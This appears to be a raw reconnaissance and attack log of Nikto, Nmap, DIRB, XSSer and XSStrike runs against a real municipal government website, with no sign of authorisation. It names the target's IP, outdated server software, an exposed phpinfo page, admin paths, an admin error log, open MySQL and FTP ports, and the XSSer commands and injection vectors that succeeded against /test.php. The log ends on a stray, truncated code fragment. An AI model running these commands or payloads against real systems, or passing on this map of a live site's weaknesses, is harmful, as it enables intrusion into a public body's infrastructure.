- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 202.38.172.174
+ Target Hostname: www.pcmcindia.gov.in
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=IN/ST=Maharashtra/L=Pune/O=Pimpri Chinchwad
Municipal Corporation/OU=Government Organisation IT/CN=www.pcmcindia.gov.in
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
+ Start Time: 2020-01-30 10:36:19 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS)
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.4.33
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache
2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false
positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /marathi/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals
potentially sensitive information via certain HTTP requests that contain specific
QUERY strings.
+ OSVDB-12184: /marathi/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals
potentially sensitive information via certain HTTP requests that contain specific
QUERY strings.
+ OSVDB-12184: /marathi/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals
potentially sensitive information via certain HTTP requests that contain specific
QUERY strings.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream:
can't connect: : Invalid argument
+ Scan terminated: 20 error(s) and 15 item(s) reported on remote host
+ End Time: 2020-01-30 10:44:56 (GMT5.5) (517 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

---------------------------------------------------------------------------
+ Target IP: 202.38.172.174
+ Target Hostname: www.pcmcindia.gov.in
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=IN/ST=Maharashtra/L=Pune/O=Pimpri Chinchwad
Municipal Corporation/OU=Government Organisation IT/CN=www.pcmcindia.gov.in
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
+ Start Time: 2020-02-03 17:09:34 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.4.33
+ Multiple index files found: /index.php, /index.html
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache
2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /test.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /test.php: PHP is installed, and a test script which runs phpinfo()
was found. This gives a lot of system information.
+ /administration.php: Admin login page/section found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 26591 requests: 1 error(s) and 16 item(s) reported on remote host
+ End Time: 2020-02-03 20:16:02 (GMT5.5) (11188 seconds)
---------------------------------------------------------------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-30 12:19 IST


NSE: Warning: Could not load 'mysql-info.nse': no path to file/directory: mysql-
info.nse
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:19
Completed NSE at 12:19, 0.00s elapsed
Initiating NSE at 12:19
Completed NSE at 12:19, 0.00s elapsed
Initiating NSE at 12:19
Completed NSE at 12:19, 0.00s elapsed
Initiating Ping Scan at 12:19
Scanning pcmcindia.gov.in (202.38.172.174) [4 ports]
Completed Ping Scan at 12:19, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:19
Completed Parallel DNS resolution of 1 host. at 12:19, 0.11s elapsed
Initiating SYN Stealth Scan at 12:19
Scanning pcmcindia.gov.in (202.38.172.174) [1000 ports]
Discovered open port 443/tcp on 202.38.172.174
Discovered open port 21/tcp on 202.38.172.174
Discovered open port 80/tcp on 202.38.172.174
Discovered open port 111/tcp on 202.38.172.174
Discovered open port 3306/tcp on 202.38.172.174
Completed SYN Stealth Scan at 12:20, 3.14s elapsed (1000 total ports)
Initiating Service scan at 12:20
Scanning 5 services on pcmcindia.gov.in (202.38.172.174)
Completed Service scan at 12:20, 12.36s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against pcmcindia.gov.in (202.38.172.174)
Retrying OS detection (try #2) against pcmcindia.gov.in (202.38.172.174)
adjust_timeouts2: packet supposedly had rtt of -1042575 microseconds. Ignoring
time.
adjust_timeouts2: packet supposedly had rtt of -1042575 microseconds. Ignoring
time.
adjust_timeouts2: packet supposedly had rtt of -947586 microseconds. Ignoring
time.
adjust_timeouts2: packet supposedly had rtt of -947586 microseconds. Ignoring
time.
adjust_timeouts2: packet supposedly had rtt of -842656 microseconds. Ignoring
time.
adjust_timeouts2: packet supposedly had rtt of -842656 microseconds. Ignoring
time.
Initiating Traceroute at 12:20
Completed Traceroute at 12:20, 3.02s elapsed
Initiating Parallel DNS resolution of 9 hosts. at 12:20
Completed Parallel DNS resolution of 9 hosts. at 12:20, 0.15s elapsed
NSE: Script scanning 202.38.172.174.
Initiating NSE at 12:20
Segmentation fault

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jan 30 12:23:21 2020


URL_BASE: https://www.pcmcindia.gov.in/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://www.pcmcindia.gov.in/ ----


==> DIRECTORY: https://www.pcmcindia.gov.in/admin/
==> DIRECTORY: https://www.pcmcindia.gov.in/cgi-bin/
+ https://www.pcmcindia.gov.in/cgi-bin/ (CODE:403|SIZE:297)
==> DIRECTORY: https://www.pcmcindia.gov.in/clips/
==> DIRECTORY: https://www.pcmcindia.gov.in/css/
==> DIRECTORY: https://www.pcmcindia.gov.in/fonts/
==> DIRECTORY: https://www.pcmcindia.gov.in/images/
==> DIRECTORY: https://www.pcmcindia.gov.in/includes/
+ https://www.pcmcindia.gov.in/index.html (CODE:200|SIZE:82)
+ https://www.pcmcindia.gov.in/index.php (CODE:200|SIZE:135664)
==> DIRECTORY: https://www.pcmcindia.gov.in/js/
==> DIRECTORY: https://www.pcmcindia.gov.in/mailer/
==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/
+ https://www.pcmcindia.gov.in/phpmyadmin (CODE:403|SIZE:299)
+ https://www.pcmcindia.gov.in/phpMyAdmin (CODE:403|SIZE:299)
+ https://www.pcmcindia.gov.in/usage (CODE:403|SIZE:294)
==> DIRECTORY: https://www.pcmcindia.gov.in/zip/

---- Entering directory: https://www.pcmcindia.gov.in/admin/ ----


==> DIRECTORY: https://www.pcmcindia.gov.in/admin/admin/
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/ajax/
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/calendar/
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/css/
+ https://www.pcmcindia.gov.in/admin/error_log (CODE:200|SIZE:120176)
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/fckeditor/
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/images/
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/includes/
+ https://www.pcmcindia.gov.in/admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/js/
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/mailer/

---- Entering directory: https://www.pcmcindia.gov.in/cgi-bin/ ----


---- Entering directory: https://www.pcmcindia.gov.in/clips/ ----

---- Entering directory: https://www.pcmcindia.gov.in/css/ ----


==> DIRECTORY: https://www.pcmcindia.gov.in/css/images/

---- Entering directory: https://www.pcmcindia.gov.in/fonts/ ----

---- Entering directory: https://www.pcmcindia.gov.in/images/ ----


==> DIRECTORY: https://www.pcmcindia.gov.in/images/banner/
==> DIRECTORY: https://www.pcmcindia.gov.in/images/Business/
==> DIRECTORY: https://www.pcmcindia.gov.in/images/icon/
==> DIRECTORY: https://www.pcmcindia.gov.in/images/images/

---- Entering directory: https://www.pcmcindia.gov.in/includes/ ----

---- Entering directory: https://www.pcmcindia.gov.in/js/ ----

---- Entering directory: https://www.pcmcindia.gov.in/mailer/ ----


==> DIRECTORY: https://www.pcmcindia.gov.in/mailer/images/
+ https://www.pcmcindia.gov.in/mailer/index.html (CODE:200|SIZE:24869)

---- Entering directory: https://www.pcmcindia.gov.in/pdf/ ----


==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/_notes/
==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/education/
==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/jobs/
==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/stores/

---- Entering directory: https://www.pcmcindia.gov.in/zip/ ----

---- Entering directory: https://www.pcmcindia.gov.in/admin/admin/ ----

---- Entering directory: https://www.pcmcindia.gov.in/admin/ajax/ ----

---- Entering directory: https://www.pcmcindia.gov.in/admin/calendar/ ----


==> DIRECTORY: https://www.pcmcindia.gov.in/admin/calendar/classes/
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/calendar/images/

---- Entering directory: https://www.pcmcindia.gov.in/admin/css/ ----

---- Entering directory: https://www.pcmcindia.gov.in/admin/fckeditor/ ----


==> DIRECTORY: https://www.pcmcindia.gov.in/admin/fckeditor/editor/
==> DIRECTORY: https://www.pcmcindia.gov.in/admin/fckeditor/images/

---- Entering directory: https://www.pcmcindia.gov.in/admin/images/ ----


xsser -u 'https://www.pcmcindia.gov.in' -g '/test.php?Id=200' --Xsa
===========================================================================

XSSer v1.8[2]: "The Hiv3!" - (https://xsser.03c8.net) - 2010/2019 -> by psy

===========================================================================
Testing [XSS from URL]...
===========================================================================
===========================================================================
[*] Test: [ 1/1 ] <-> 2020-02-03 18:56:37.939006
===========================================================================

[+] Target:

[ https://www.pcmcindia.gov.in ]

---------------------------------------------

[!] Hashing:

[ 6cea8d3cd00ff3e2fba23b984863299b ] : [ XSA ]

---------------------------------------------

[*] Trying: + ['XSA']

https://www.pcmcindia.gov.in/test.php?Id=200

=============================================
[*] Injection(s) Results:
=============================================

[ FOUND! ] -> [ 6cea8d3cd00ff3e2fba23b984863299b ] : [ XSA ] -> [ ">PAYLOAD ]

==================================================
Mosquito(es) landed!
==================================================

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 0
- Successful: 1
- Accur: 100.0 %

===========================================================================
[*] List of XSS injections:
===========================================================================

You have found: [ 1 ] possible (without --reverse-check) XSS vector(s)!

---------------------

[+] Target: https://www.pcmcindia.gov.in | /test.php?Id=200


[+] Vector: [ XSA ]
[!] Method: User-Agent Injection
[*] Hash: 6cea8d3cd00ff3e2fba23b984863299b
[*] Payload: ">6cea8d3cd00ff3e2fba23b984863299b
[!] Status: XSS FOUND!
--------------------------------------------------

xsser -u 'https://www.pcmcindia.gov.in' -g '/test.php?Id=200' --Coo


===========================================================================

XSSer v1.8[2]: "The Hiv3!" - (https://xsser.03c8.net) - 2010/2019 -> by psy

===========================================================================
Testing [XSS from URL]...
===========================================================================
===========================================================================
[*] Test: [ 1/1 ] <-> 2020-02-03 18:54:30.602553
===========================================================================

[+] Target:

[ https://www.pcmcindia.gov.in ]

---------------------------------------------

[!] Hashing:

[ 35fdd4c6403ccd2a066a52a1ff173a27 ] : [ COO ]

---------------------------------------------

[*] Trying: + ['COO']

https://www.pcmcindia.gov.in/test.php?Id=200

=============================================
[*] Injection(s) Results:
=============================================

[ FOUND! ] -> [ 35fdd4c6403ccd2a066a52a1ff173a27 ] : [ COO ] -> [ ">PAYLOAD ]

==================================================
Mosquito(es) landed!
==================================================

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 0
- Successful: 1
- Accur: 100.0 %

===========================================================================
[*] List of XSS injections:
===========================================================================

You have found: [ 1 ] possible (without --reverse-check) XSS vector(s)!


---------------------

[+] Target: https://www.pcmcindia.gov.in | /test.php?Id=200


[+] Vector: [ COO ]
[!] Method: Cookie Injection
[*] Hash: 35fdd4c6403ccd2a066a52a1ff173a27
[*] Payload: ">35fdd4c6403ccd2a066a52a1ff173a27
[!] Status: XSS FOUND!
--------------------------------------------------

https://www.pcmcindia.gov.in/marathi/news-detail.php?Id=200

XSStrike v3.1.4

[~] Crawling the target


------------------------------------------------------------
[+] Vulnerable component: jquery v1.12.4
[!] Component location:
https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js
[!] Total vulnerabilities: 3
[!] Summary: parseHTML() executes scripts in event handlers
[!] Severity: medium
[!] CVE: CVE-2015-9251
[!] Summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other
products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype
pollution
[!] Severity: low
[!] CVE: CVE-2019-11358
[!] Summary: 3rd party CORS request may execute
[!] Severity: medium
[!] CVE: CVE-2015-9251
------------------------------------------------------------

XSStrike v3.1.4

[~] Crawling the target


[++] Vulnerable webpage: https://www.pcmcindia.gov.in/test.php
[++] Vector for : <a%09oNMoUSeOVeR%09=%09a=prompt,a()//v3dm0s
[!] Progress: 3/3

XSStrike v3.1.4

[~] Crawling the target


------------------------------------------------------------
[+] Vulnerable component: jquery v1.12.4
[!] Component location:
https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js
[!] Total vulnerabilities: 3
[!] Summary: parseHTML() executes scripts in event handlers
[!] Severity: medium
[!] CVE: CVE-2015-9251
[!] Summary: 3rd party CORS request may execute
[!] Severity: medium
[!] CVE: CVE-2015-9251
[!] Summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other
products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype
pollution
[!] Severity: low
[!] CVE: CVE-2019-11358
------------------------------------------------------------
[+] Potentially vulnerable objects found at https://www.pcmcindia.gov.in/index.php
------------------------------------------------------------
------------------------------------------------------------
on.href.lastIndexOf("/")+1);
